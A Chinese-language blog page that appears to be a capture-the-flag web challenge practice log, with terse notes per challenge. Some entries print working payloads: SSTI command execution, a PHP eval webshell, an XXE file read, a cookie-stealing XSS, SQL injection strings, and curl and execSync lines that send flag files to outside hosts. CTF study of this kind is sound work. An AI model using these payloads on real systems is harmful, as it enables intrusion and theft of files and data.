<!DOCTYPE html>
<html>
  <!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  
  <title>web刷题记录 - LionTree</title>
  <link rel="icon" href="https://i.imgur.com/SrZt9VU.jpg" type="image/x-icon">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
  
  <meta name="keywords" content=writeup>
  
  
  
    <link rel="alternate" href="/atom.xml " title="LionTree" type="application/atom+xml">
  

  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 4.2.1"></head>

  <body>
    <div class="container">
      <header class="header">
  <div class="blog-title">
    <a href="/" class="logo">LionTree</a>
    <div class="subtitle"></div>
  </div>
  <nav class="navbar">
    <ul class="menu">
      
        <li class="menu-item">
          <a href="/" class="menu-item-link">Home</a>
        </li>
      
        <li class="menu-item">
          <a href="/summary" class="menu-item-link">Summary</a>
        </li>
      
        <li class="menu-item">
          <a href="/about" class="menu-item-link">About</a>
        </li>
      
        <li class="menu-item">
          <a href="/atom.xml" class="menu-item-link">RSS</a>
        </li>
      
    </ul>
  </nav>
</header>

<article class="post">
  <div class="post-title">
    <h1 class="article-title">web刷题记录</h1>
  </div>

  <!-- 文章目录 -->
  <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#BJDCTF2020"><span class="toc-text">BJDCTF2020</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#EasySearch"><span class="toc-text">EasySearch</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Mark-loves-cat"><span class="toc-text">Mark loves cat</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#The-mystery-of-ip"><span class="toc-text">The mystery of ip</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Cookie-is-so-stable"><span class="toc-text">Cookie is so stable</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ezPHP"><span class="toc-text">ezPHP</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ZJCTF，不过如此"><span class="toc-text">ZJCTF，不过如此</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#BJDCTF-2nd"><span class="toc-text">BJDCTF 2nd</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#fake-google"><span class="toc-text">fake google</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#old-hack"><span class="toc-text">old-hack</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#duangShell"><span class="toc-text">duangShell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#简单注入"><span class="toc-text">简单注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#xss之光"><span class="toc-text">xss之光</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#文件探测"><span class="toc-text">文件探测</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#GXYCTF2019"><span class="toc-text">GXYCTF2019</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#BabyUpload"><span class="toc-text">BabyUpload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#StrongestMind"><span class="toc-text">StrongestMind</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#强网杯2019"><span class="toc-text">强网杯2019</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#upload"><span class="toc-text">upload</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CISCN2019"><span class="toc-text">CISCN2019</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#华北赛区-Day1-Web5-CyberPunk"><span class="toc-text">华北赛区 Day1 Web5 CyberPunk</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#华东南赛区-Web11"><span class="toc-text">华东南赛区 Web11</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#华东南赛区-Double-Secret"><span class="toc-text">华东南赛区 Double Secret</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#华东北赛区-web2"><span class="toc-text">华东北赛区 web2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web4"><span class="toc-text">Web4</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#FBCTF2019"><span class="toc-text">FBCTF2019</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#RCEService"><span class="toc-text">RCEService</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#BSidesCF-2019"><span class="toc-text">BSidesCF 2019</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Futurella"><span class="toc-text">Futurella</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Kookie"><span class="toc-text">Kookie</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Pick-Tac-Toe"><span class="toc-text">Pick Tac Toe</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Had-a-bad-day"><span class="toc-text">Had a bad day</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SVGMagic"><span class="toc-text">SVGMagic</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HarekazeCTF2019"><span class="toc-text">HarekazeCTF2019</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#encode-and-encode"><span class="toc-text">encode_and_encode</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#RCTF2015"><span class="toc-text">RCTF2015</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#EasySQL"><span class="toc-text">EasySQL</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SWPU2019"><span class="toc-text">SWPU2019</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web4-1"><span class="toc-text">Web4</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web3"><span class="toc-text">Web3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web6"><span class="toc-text">Web6</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SWPU2018"><span class="toc-text">SWPU2018</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#SimplePHP"><span class="toc-text">SimplePHP</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#EIS-2019"><span class="toc-text">EIS 2019</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#EzPOP"><span class="toc-text">EzPOP</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#GYCTF2020"><span class="toc-text">GYCTF2020</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Node-Game"><span class="toc-text">Node Game</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ezsqli"><span class="toc-text">Ezsqli</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#安洵杯-2019"><span class="toc-text">安洵杯 2019</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#不是文件上传"><span class="toc-text">不是文件上传</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#网鼎杯"><span class="toc-text">网鼎杯</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Unfinish"><span class="toc-text">Unfinish</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#b01lersCTF-2020"><span class="toc-text">b01lersCTF 2020</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#life-on-mars"><span class="toc-text">life_on_mars</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Zer0ptsCTF-2020"><span class="toc-text">Zer0ptsCTF 2020</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Can-you-guess-it"><span class="toc-text">Can you guess it?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#notepad"><span class="toc-text">notepad</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#urlapp"><span class="toc-text">urlapp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MusicBlog"><span class="toc-text">MusicBlog</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#phpNantokaAdmin"><span class="toc-text">phpNantokaAdmin</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#GWCTF2019"><span class="toc-text">GWCTF2019</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#你的名字"><span class="toc-text">你的名字</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#V-amp-N2020-公开赛"><span class="toc-text">V&amp;N2020 公开赛</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#EasySpringMVC"><span class="toc-text">EasySpringMVC</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#VolgaCTF-2020-Qualifier"><span class="toc-text">VolgaCTF 2020 Qualifier</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Netcorp"><span class="toc-text">Netcorp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#NCTF2019"><span class="toc-text">NCTF2019</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#SQLi"><span class="toc-text">SQLi</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#watevrCTF-2019"><span class="toc-text">watevrCTF-2019</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Cookie-Store"><span class="toc-text">Cookie Store</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Pickle-Store"><span class="toc-text">Pickle Store</span></a></li></ol></li></ol>

  <div class="post-content">
    <p>学<a href="http://blog.sern.site:8000/2020/02/02/writeup/buuoj/buuoj%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/" target="_blank" rel="noopener">Amadeus</a>搞个刷题记录（其实是懒得写wp了）</p>
<h1 id="BJDCTF2020"><a href="#BJDCTF2020" class="headerlink" title="BJDCTF2020"></a>BJDCTF2020</h1><h2 id="EasySearch"><a href="#EasySearch" class="headerlink" title="EasySearch"></a>EasySearch</h2><ul>
<li>index.php.swp源码泄露</li>
<li>爆破md5</li>
<li>ssi注入</li>
</ul>
<h2 id="Mark-loves-cat"><a href="#Mark-loves-cat" class="headerlink" title="Mark loves cat"></a>Mark loves cat</h2><ul>
<li>变量覆盖，exit的时候输出flag</li>
</ul>
<h2 id="The-mystery-of-ip"><a href="#The-mystery-of-ip" class="headerlink" title="The mystery of ip"></a>The mystery of ip</h2><ul>
<li>smarty ssti,{{system("cat /flag")}}命令执行</li>
</ul>
<h2 id="Cookie-is-so-stable"><a href="#Cookie-is-so-stable" class="headerlink" title="Cookie is so stable"></a>Cookie is so stable</h2><ul>
<li>twig ssti 命令执行{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

</li>
</ul>
<h2 id="ezPHP"><a href="#ezPHP" class="headerlink" title="ezPHP"></a>ezPHP</h2><ul>
<li><code>$_SERVER[&#39;QUERY_STRING&#39;]</code>url编码绕过</li>
<li><code>%0a</code>绕过正则</li>
<li>利用<code>$_REQUEST</code>解析顺序</li>
<li>data伪协议</li>
<li>数组绕过sha1比较</li>
<li>create_function()代码注入</li>
<li><code>get_defined_vars()</code>获取所有变量值</li>
<li>字符串异或和取反</li>
</ul>
<h2 id="ZJCTF，不过如此"><a href="#ZJCTF，不过如此" class="headerlink" title="ZJCTF，不过如此"></a>ZJCTF，不过如此</h2><ul>
<li><code>preg_replace()</code>代码执行</li>
</ul>
<h1 id="BJDCTF-2nd"><a href="#BJDCTF-2nd" class="headerlink" title="BJDCTF 2nd"></a>BJDCTF 2nd</h1><h2 id="fake-google"><a href="#fake-google" class="headerlink" title="fake google"></a>fake google</h2><ul>
<li>flask的ssti模板注入</li>
</ul>
<h2 id="old-hack"><a href="#old-hack" class="headerlink" title="old-hack"></a>old-hack</h2><ul>
<li>thinkphp rce直接打</li>
</ul>
<h2 id="duangShell"><a href="#duangShell" class="headerlink" title="duangShell"></a>duangShell</h2><ul>
<li>curl无回显命令执行</li>
</ul>
<h2 id="简单注入"><a href="#简单注入" class="headerlink" title="简单注入"></a>简单注入</h2><ul>
<li>无<code>&#39;</code>情况下用<code>\</code>注入</li>
<li>无<code>select</code>无堆叠注入，但能拿到当前用的表的数据</li>
</ul>
<h2 id="xss之光"><a href="#xss之光" class="headerlink" title="xss之光"></a>xss之光</h2><ul>
<li>这题….直接反序列化一个字符串<code>&lt;script&gt;window.location.href=&#39;xxxx&#39;+document.cookie&lt;/script&gt;</code>就行</li>
<li>预期解是反序列化<code>Exception</code>类，利用<code>__toString()</code>造成xss</li>
</ul>
<h2 id="文件探测"><a href="#文件探测" class="headerlink" title="文件探测"></a>文件探测</h2><ul>
<li>php <code>srpintf</code>格式化字符串漏洞，可以用<code>%</code>将后面的<code>%d</code>转义</li>
<li>AES加密，密钥已知，明文是一个放在session中的随机字符串，并且难以破解。但可以不带<code>PHPSESSID</code>访问使明文为空，即可算出对应密文</li>
</ul>
<h1 id="GXYCTF2019"><a href="#GXYCTF2019" class="headerlink" title="GXYCTF2019"></a>GXYCTF2019</h1><h2 id="BabyUpload"><a href="#BabyUpload" class="headerlink" title="BabyUpload"></a>BabyUpload</h2><ul>
<li>上传.htaccess改变文件解析<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SetHandler application&#x2F;x-httpd-php</span><br></pre></td></tr></table></figure></li>
<li>老版php标签<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=<span class="string">'php'</span>&gt;<span class="keyword">eval</span>($_REQUEST[<span class="string">'LionTree'</span>])&lt;/script&gt;</span><br></pre></td></tr></table></figure></li>
<li>这题搞了个2048字节的限制。。结果正常的图片一张都传不上去。。无语</li>
</ul>
<h2 id="StrongestMind"><a href="#StrongestMind" class="headerlink" title="StrongestMind"></a>StrongestMind</h2><ul>
<li>写个脚本算术即可</li>
</ul>
<h1 id="强网杯2019"><a href="#强网杯2019" class="headerlink" title="强网杯2019"></a>强网杯2019</h1><h2 id="upload"><a href="#upload" class="headerlink" title="upload"></a>upload</h2><ul>
<li>GIF89a绕过<code>getimagesize</code></li>
<li>文件上传使用了<code>copy</code>而不是<code>move_uploaded_file</code>,利用反序列化去将已上传的webshell改为<code>.php</code>后缀</li>
<li>反序列化exp记得写命名空间。。忘了这个折腾半天</li>
</ul>
<h1 id="CISCN2019"><a href="#CISCN2019" class="headerlink" title="CISCN2019"></a>CISCN2019</h1><h2 id="华北赛区-Day1-Web5-CyberPunk"><a href="#华北赛区-Day1-Web5-CyberPunk" class="headerlink" title="华北赛区 Day1 Web5 CyberPunk"></a>华北赛区 Day1 Web5 CyberPunk</h2><ul>
<li>二次注入</li>
</ul>
<h2 id="华东南赛区-Web11"><a href="#华东南赛区-Web11" class="headerlink" title="华东南赛区 Web11"></a>华东南赛区 Web11</h2><ul>
<li>smarty ssti,{{system("cat /flag")}}命令执行</li>
</ul>
<h2 id="华东南赛区-Double-Secret"><a href="#华东南赛区-Double-Secret" class="headerlink" title="华东南赛区 Double Secret"></a>华东南赛区 Double Secret</h2><ul>
<li>flask ssti</li>
<li>flask debug模式安全</li>
</ul>
<h2 id="华东北赛区-web2"><a href="#华东北赛区-web2" class="headerlink" title="华东北赛区 web2"></a>华东北赛区 web2</h2><ul>
<li>xss 中<code>&lt;svg&gt;</code>标签的使用,使后面的特殊符号能够用html实体替代</li>
</ul>
<h2 id="Web4"><a href="#Web4" class="headerlink" title="Web4"></a>Web4</h2><ul>
<li><code>urllib.urlopen</code>任意文件读取，<code>^file.*</code>禁了file协议，有三种绕过<ul>
<li>空格+<code>file://</code></li>
<li>CVE-2019-9948,<code>local_file://</code></li>
<li>直接<code>app.py</code>读到源码</li>
</ul>
</li>
<li>伪随机数<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">random.seed(uuid.getnode())</span><br><span class="line">app.config[<span class="string">'SECRET_KEY'</span>] = str(random.random()*<span class="number">233</span>)</span><br></pre></td></tr></table></figure>
通过读取<code>/sys/class/net/eth0/address</code>得到mac地址，能够算出<code>uuid.getnode()</code>的值，爆破可以得到SECRET_KEY</li>
<li>客户端session安全</li>
</ul>
<h1 id="FBCTF2019"><a href="#FBCTF2019" class="headerlink" title="FBCTF2019"></a>FBCTF2019</h1><h2 id="RCEService"><a href="#RCEService" class="headerlink" title="RCEService"></a>RCEService</h2><ul>
<li>PCRE回溯次数绕过</li>
<li>非预期解，利用换行符绕过</li>
<li>黑盒考这个是真想不到。。</li>
</ul>
<h1 id="BSidesCF-2019"><a href="#BSidesCF-2019" class="headerlink" title="BSidesCF 2019"></a>BSidesCF 2019</h1><h2 id="Futurella"><a href="#Futurella" class="headerlink" title="Futurella"></a>Futurella</h2><ul>
<li>右键查看源代码..</li>
</ul>
<h2 id="Kookie"><a href="#Kookie" class="headerlink" title="Kookie"></a>Kookie</h2><ul>
<li>登陆后改cookie</li>
</ul>
<h2 id="Pick-Tac-Toe"><a href="#Pick-Tac-Toe" class="headerlink" title="Pick Tac Toe"></a>Pick Tac Toe</h2><ul>
<li>直接发包可以覆盖对手走过的地方</li>
<li>正常下还真是下不过电脑..</li>
</ul>
<h2 id="Had-a-bad-day"><a href="#Had-a-bad-day" class="headerlink" title="Had a bad day"></a>Had a bad day</h2><ul>
<li>文件包含 <code>不存在的/../flag</code></li>
</ul>
<h2 id="SVGMagic"><a href="#SVGMagic" class="headerlink" title="SVGMagic"></a>SVGMagic</h2><ul>
<li>将xxe payload伪装成svg文件<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">note</span> [</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY <span class="meta-keyword">file</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">"file:///etc/passwd"</span> &gt;</span></span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">svg</span> <span class="attr">height</span>=<span class="string">"100"</span> <span class="attr">width</span>=<span class="string">"1000"</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">text</span> <span class="attr">x</span>=<span class="string">"10"</span> <span class="attr">y</span>=<span class="string">"20"</span>&gt;</span><span class="symbol">&amp;file;</span><span class="tag">&lt;/<span class="name">text</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">svg</span>&gt;</span></span><br></pre></td></tr></table></figure></li>
<li>flag在/proc/self/cwd/flag.txt…</li>
</ul>
<h1 id="HarekazeCTF2019"><a href="#HarekazeCTF2019" class="headerlink" title="HarekazeCTF2019"></a>HarekazeCTF2019</h1><h2 id="encode-and-encode"><a href="#encode-and-encode" class="headerlink" title="encode_and_encode"></a>encode_and_encode</h2><ul>
<li>利用json_decode会自动将utf8编码解码</li>
</ul>
<h1 id="RCTF2015"><a href="#RCTF2015" class="headerlink" title="RCTF2015"></a>RCTF2015</h1><h2 id="EasySQL"><a href="#EasySQL" class="headerlink" title="EasySQL"></a>EasySQL</h2><ul>
<li>找回密码的地方二次注入</li>
<li>这里用了很少见到的<code>&quot;</code>而不是<code>&#39;</code></li>
<li>测试的时候可以直接用<code>&#39;&quot;\</code>这样的组合，一次确定是否存在注入</li>
<li>比较坑的是给了个没用的phpinfo，还以为要sql注入写文件覆盖opcache</li>
</ul>
<h1 id="SWPU2019"><a href="#SWPU2019" class="headerlink" title="SWPU2019"></a>SWPU2019</h1><h2 id="Web4-1"><a href="#Web4-1" class="headerlink" title="Web4"></a>Web4</h2><ul>
<li>无回显情况下的堆叠注入</li>
<li>可以用<code>;</code>检测堆叠注入</li>
<li>prepare statement 绕过关键词过滤</li>
<li>变量覆盖导致的文件读取</li>
</ul>
<h2 id="Web3"><a href="#Web3" class="headerlink" title="Web3"></a>Web3</h2><ul>
<li>flask前端session伪造</li>
<li>上传软链接读取敏感文件</li>
<li>linux下利用<code>&amp;</code>多语句命令执行</li>
<li><code>/proc/self/cwd/</code>读取当前进程路径下的文件</li>
<li><code>/proc/self/environ</code>获取当前进程环境变量，得到flask绝对路径</li>
<li>curl 外带<code>@</code>读文件</li>
<li>awk声明无法使用的字符<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">(III=`awk <span class="string">'BEGIN&#123;printf \"%c\", 47&#125;'</span>`&amp;&amp;curl xxx.xxx.xxx.xxx:9999 -T `<span class="built_in">echo</span> <span class="variable">$&#123;III&#125;</span>ctf<span class="variable">$&#123;III&#125;</span>hgfjakshgfuasguiasguiaaui<span class="variable">$&#123;III&#125;</span>myflask<span class="variable">$&#123;III&#125;</span>flag<span class="variable">$&#123;III&#125;</span>flag.jpg`).zip</span></span><br></pre></td></tr></table></figure>

</li>
</ul>
<h2 id="Web6"><a href="#Web6" class="headerlink" title="Web6"></a>Web6</h2><ul>
<li><code>select with rollup</code> 注入</li>
<li>session原生类反序列化，soap ssrf</li>
</ul>
<h1 id="SWPU2018"><a href="#SWPU2018" class="headerlink" title="SWPU2018"></a>SWPU2018</h1><h2 id="SimplePHP"><a href="#SimplePHP" class="headerlink" title="SimplePHP"></a>SimplePHP</h2><ul>
<li>phar反序列化</li>
<li>phar反序列化记得用绝对路径。。又被这个坑了</li>
</ul>
<h1 id="EIS-2019"><a href="#EIS-2019" class="headerlink" title="EIS 2019"></a>EIS 2019</h1><h2 id="EzPOP"><a href="#EzPOP" class="headerlink" title="EzPOP"></a>EzPOP</h2><ul>
<li>php伪协议去除死亡exit</li>
</ul>
<h1 id="GYCTF2020"><a href="#GYCTF2020" class="headerlink" title="GYCTF2020"></a>GYCTF2020</h1><h2 id="Node-Game"><a href="#Node-Game" class="headerlink" title="Node Game"></a>Node Game</h2><ul>
<li>nodejs <code>http.get</code>设计缺陷，通过Request Splitting造成ssrf</li>
<li>pug模板命令执行<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">- global.process.mainModule.require(<span class="string">'child_process'</span>).execSync(<span class="string">'curl http://174.1.29.57/ -X POST -d `cat /flag.txt`'</span>)</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h2 id="Ezsqli"><a href="#Ezsqli" class="headerlink" title="Ezsqli"></a>Ezsqli</h2><ul>
<li>在无<code>information_schema</code>的情况下利用sys库获取表名</li>
<li>无<code>union select</code>的情况下无列名注入<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1-((<span class="keyword">select</span> <span class="string">'a'</span>) = (<span class="keyword">select</span> <span class="keyword">substr</span>(<span class="keyword">group_concat</span>(table_name),<span class="number">1</span>,<span class="number">1</span>) <span class="keyword">from</span> sys.schema_table_statistics_with_buffer <span class="keyword">where</span> table_schema=<span class="keyword">database</span>()))</span><br></pre></td></tr></table></figure></li>
<li>看<a href="https://www.smi1e.top/%e6%96%b0%e6%98%a5%e6%88%98%e7%96%ab%e5%85%ac%e7%9b%8a%e8%b5%9b-ezsqli-%e5%87%ba%e9%a2%98%e5%b0%8f%e8%ae%b0/" target="_blank" rel="noopener">smile师傅的出题笔记</a>还有一个考点是mysql在比较时不区分大小写，需要用<code>CONCAT(&quot;A&quot;, CAST(0 AS JSON))</code>强制进行字节对字节的比较。不过buu上的环境不知道为啥用不了CAST，而且flag里也没有大写字母</li>
</ul>
<h1 id="安洵杯-2019"><a href="#安洵杯-2019" class="headerlink" title="安洵杯 2019"></a>安洵杯 2019</h1><h2 id="不是文件上传"><a href="#不是文件上传" class="headerlink" title="不是文件上传"></a>不是文件上传</h2><ul>
<li>insert注入反序列化序列</li>
<li>文件名中不能有双引号，需要用16进制插入数据库中</li>
</ul>
<h1 id="网鼎杯"><a href="#网鼎杯" class="headerlink" title="网鼎杯"></a>网鼎杯</h1><h2 id="Unfinish"><a href="#Unfinish" class="headerlink" title="Unfinish"></a>Unfinish</h2><ul>
<li>register.php直接可以盲注，过滤了<code>,</code>和<code>information</code><ul>
<li><code>,</code>可以用<code>case when</code>绕过</li>
<li>尝试用innodb的表和sys中的表都没成功，看网上wp都是盲猜存在flag表做的…</li>
</ul>
</li>
<li>还有一种做法是注册的时候将想要的内容放入username中，登录查看<ul>
<li>可以利用两次hex后是纯数字的特性进行二次注入<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0'%2B(<span class="keyword">select</span> <span class="keyword">hex</span>(<span class="keyword">hex</span>(<span class="keyword">database</span>())))%<span class="number">2</span>B<span class="string">'0</span></span><br></pre></td></tr></table></figure>

</li>
</ul>
</li>
</ul>
<h1 id="b01lersCTF-2020"><a href="#b01lersCTF-2020" class="headerlink" title="b01lersCTF 2020"></a>b01lersCTF 2020</h1><h2 id="life-on-mars"><a href="#life-on-mars" class="headerlink" title="life_on_mars"></a>life_on_mars</h2><ul>
<li>长知识了..第一次见在from位置的注入，黑盒下一脸懵逼..<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cur.execute(<span class="string">"SELECT name, description FROM "</span> + <span class="keyword">search</span>)</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h1 id="Zer0ptsCTF-2020"><a href="#Zer0ptsCTF-2020" class="headerlink" title="Zer0ptsCTF 2020"></a>Zer0ptsCTF 2020</h1><h2 id="Can-you-guess-it"><a href="#Can-you-guess-it" class="headerlink" title="Can you guess it?"></a>Can you guess it?</h2><ul>
<li><code>$_SERVER[&#39;PHP_SELF&#39;]</code>可控，<code>index.php/config.php</code>会访问index.php,但<code>$_SERVER[&#39;PHP_SELF&#39;]</code>会是<code>index.php/config.php</code></li>
<li><code>basename()</code>函数缺陷，会把文件名开头的非ASCII值丢掉</li>
</ul>
<h2 id="notepad"><a href="#notepad" class="headerlink" title="notepad"></a>notepad</h2><ul>
<li>flask ssti读取secret_key</li>
<li>通过session进行pickle反序列化</li>
<li>无法弹shell，使用sleep无回显命令执行</li>
</ul>
<h2 id="urlapp"><a href="#urlapp" class="headerlink" title="urlapp"></a>urlapp</h2><ul>
<li>redis CRLF注入</li>
<li>redis <code>BITOP</code>指令，对key做位运算，并把结果保存到新key里</li>
<li>redis <code>setbit</code>指令，改变key的某一位</li>
</ul>
<h2 id="MusicBlog"><a href="#MusicBlog" class="headerlink" title="MusicBlog"></a>MusicBlog</h2><ul>
<li><code>strip_tags()</code>缺陷，允许在标签名中存在<code>/</code></li>
<li>注入<code>&lt;a/udio id=&quot;like&quot; href=http://xxxx&gt;</code>，会被解析成<code>&lt;a&gt;</code>标签，绕过csp</li>
<li>不知道为啥在buu上nc收不到数据，需要用requestbin</li>
</ul>
<h2 id="phpNantokaAdmin"><a href="#phpNantokaAdmin" class="headerlink" title="phpNantokaAdmin"></a>phpNantokaAdmin</h2><ul>
<li>sqlite注入</li>
<li>sqlite的<code>sqlite_master</code>中保存了所有表名以及创建表时的create语句</li>
<li>在创建表时可以用as来复制另一个表中的数据</li>
<li><code>as &quot;...&quot;</code>将原有的干扰字符闭合到查询的别名里</li>
<li>sqlite <code>[]</code>替代双引号</li>
</ul>
<h1 id="GWCTF2019"><a href="#GWCTF2019" class="headerlink" title="GWCTF2019"></a>GWCTF2019</h1><h2 id="你的名字"><a href="#你的名字" class="headerlink" title="你的名字"></a>你的名字</h2><ul>
<li>flask的SSTI，但是返回的是php的报错…wp上说能用http头判断但buu上的环境只有一个<code>server:openrestry</code>，根本看不出来…</li>
<li>过滤了 {{ ,并且会把一些关键字替换为空，使用 {% 加双写绕过 {% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclasconfigses__()[59].__init__.func_glconfigobals.linecache.oconfigs.popconfigen('curl "http://xss.buuoj.cn/index.php?do=api%26id=uHi9SZ%26location=`cat /flag_1s_Hera`"') %}1{% endiconfigf %} 

</li>
</ul>
<h1 id="V-amp-N2020-公开赛"><a href="#V-amp-N2020-公开赛" class="headerlink" title="V&amp;N2020 公开赛"></a>V&amp;N2020 公开赛</h1><h2 id="EasySpringMVC"><a href="#EasySpringMVC" class="headerlink" title="EasySpringMVC"></a>EasySpringMVC</h2><ul>
<li>java 反序列化时会调用类的<code>readObject</code>方法</li>
</ul>
<h1 id="VolgaCTF-2020-Qualifier"><a href="#VolgaCTF-2020-Qualifier" class="headerlink" title="VolgaCTF 2020 Qualifier"></a>VolgaCTF 2020 Qualifier</h1><h2 id="Netcorp"><a href="#Netcorp" class="headerlink" title="Netcorp"></a>Netcorp</h2><ul>
<li>幽灵猫读classes目录下的class文件，得到源码，发现存在文件上传</li>
<li>上传jsp马后幽灵猫包含</li>
</ul>
<h1 id="NCTF2019"><a href="#NCTF2019" class="headerlink" title="NCTF2019"></a>NCTF2019</h1><h2 id="SQLi"><a href="#SQLi" class="headerlink" title="SQLi"></a>SQLi</h2><ul>
<li><code>regexp</code>注入 </li>
</ul>
